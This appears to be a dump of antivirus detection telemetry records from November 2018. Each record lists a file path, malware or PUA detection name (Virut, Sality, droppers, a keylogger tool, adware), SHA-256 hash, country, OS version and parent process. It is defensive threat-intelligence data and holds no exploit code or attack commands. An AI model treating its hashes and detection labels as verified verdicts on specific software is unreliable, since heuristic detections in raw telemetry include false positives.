  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7a54ee07b5ff9b1ef612a717f7216e0e79737c29e0b565e054a8ce0d144c4da2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:18:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='index-jquery.html', filepath='D:\\RIBS\\tax\\new\\inventory\\training\\src\\angular\\docs\\examples\\example-example19\\index-jquery.html', filesize=8000, name='W32/Chir.B.#M1.#R1'), hash='6935b5a246275e7620c54e08c3beefbe7f471ea21c814a21e2d2917d69000def', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='129c87278ccf88c8d473234adad580110c32c77ace9bd7cd989d3aeae006bfb9', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2ae52030fdf5dedc785445196561c2412674d0e6d25ffbeaf339679d0cd47513', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2AE52030FDF5DEDC785445196561C2412674D0E6D25FFBEAF339679D0CD47513', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2ae52030fdf5dedc785445196561c2412674d0e6d25ffbeaf339679d0cd47513', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:26:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120521-a3d4cae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4a96b090\\AVSCAN-20181101-120509-A24615A8\\AVSCAN-20181101-120521-A3D4CAE3', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002315-3d7c2e7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002315-3D7C2E7C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='languageid finder.exe', filepath='C:\\Program Files (x86)\\RocketDock\\Tools\\LanguageID Finder.exe', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a86dfb1303bcd41fe67c92795f113ddbeb641e9d561accc80aa447a10f40358', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:01:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\11A4B7E010799154DDC53E76332C031C22DADA19A2803E99942CF60196929396', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093936-c6f694d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093936-C6F694D5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='x64.exe', filepath='F:\\29.10.18\\Software\\Installer\\DotNetFX35\\dotNetFX35\\x64\\x64.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\wymz3e23ops\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152330-9a87c2cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152330-9A87C2CC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212246-e4c798c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212246-E4C798C5', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152900-d9c7bec4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152900-D9C7BEC4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='quarta.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim\\ESERCIZI INFORMATICA\\esercizi vari\\QUARTA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T04:22:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\f3a1auwacbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120909-0745dc8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57e73b18\\AVSCAN-20181101-120805-FE3FD36B\\AVSCAN-20181101-120909-0745DC8B', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rundll32.exe', filepath='H:\\RUNDLL32.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='dc4940b65723ed334aa0f54c9152054c15e591d85e463f62aa076ba5516b23f9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T10:01:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-145835-fec10135', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b647c110\\AVSCAN-20181102-133332-24AE2147\\AVSCAN-20181102-145835-FEC10135', filesize=576000, name='TR/ATRAPS.vkmip.#M1.#R1'), hash='9f7957a6c81655d1a33cdcc4fa9aa0ff11953712d672577c777860a0be31eb0f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bomberic2.exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\Bomberic2.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8e50f043a7eab445b4586e06a5e3dfde4692082979fcfe1fae86675122a15553', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='8acf2ce432951634892ce92246588865acda8902c2a932281141081b1158fc8d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filepath='H:\\{dc86b55d-9ce5-6da4-cd3b-f479b33f70f9}\\45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='864c5147eb1d46a675ca2064414e42ddd8bd55da363d9321ccf58480954c6bec', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T13:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095305-61e3bda5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095305-61E3BDA5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154636-d27d37cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154636-D27D37CF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151514-3b79e3ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151514-3B79E3EA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3exbbzj1jys\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xvxk1msyspq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T11:22:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-183047-95a5affb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9006c36\\AVSCAN-20181104-182423-6D73F918\\AVSCAN-20181104-183047-95A5AFFB', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:30:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195340-dec7b78d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195340-DEC7B78D', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:53:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224924-e39045eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200142-1862C1A1\\AVSCAN-20181104-224924-E39045EB', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a9054675e0617c8d5d94d435a9b2f632fad930061690840bcc2046e5df10b1cb', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A9054675E0617C8D5D94D435A9B2F632FAD930061690840BCC2046E5DF10B1CB', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a9054675e0617c8d5d94d435a9b2f632fad930061690840bcc2046e5df10b1cb', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:18:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T14:19:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ppj2dd.exe', filepath='\\\\?\\D:\\New folder (4)\\افراح\\العاب2\\الغابة\\الشرطة\\PPJ2DD.EXE', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='0333f7f74d900b0c01d40f3b7accc9b05d119a0a4bf29382ff6e20d63f30a652', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:39:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T02:15:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002440a', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002440a', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:50:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:02:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='F:\\Usuarios\\cfigueroa\\DRIVERS\\PROGRAMAS\\UltimateDefrag.exe', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:57:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125201-712c86c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9e177da\\AVSCAN-20181104-123703-08E986C2\\AVSCAN-20181104-125201-712C86C8', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T04:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130839-0b8317fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130839-0B8317FD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232740-5b23dce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-232740-5B23DCE5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:27:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:35:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240a3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240a3', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165441-52776bd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebe48554\\AVSCAN-20181104-165143-387DDB14\\AVSCAN-20181104-165441-52776BD7', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:54:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bdutil.exe', filepath='E:\\ulaed\\SWDownload\\Program files\\Spark Browser\\bdutil.exe', filesize=896000, name='W32/Chir.B.#M1.#R1'), hash='a05fd969a9cc52357cfc389932948ec3776930fa5fb19da434e97141e6316e12', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:06:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clover.exe', filepath='C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\KDubaSoftDownloads\\setup_clover_3.4.0.exe', parentsize=6219552, timestamp='2018-11-04T13:16:36Z'), dt=datetime.date(2018, 11, 4)),
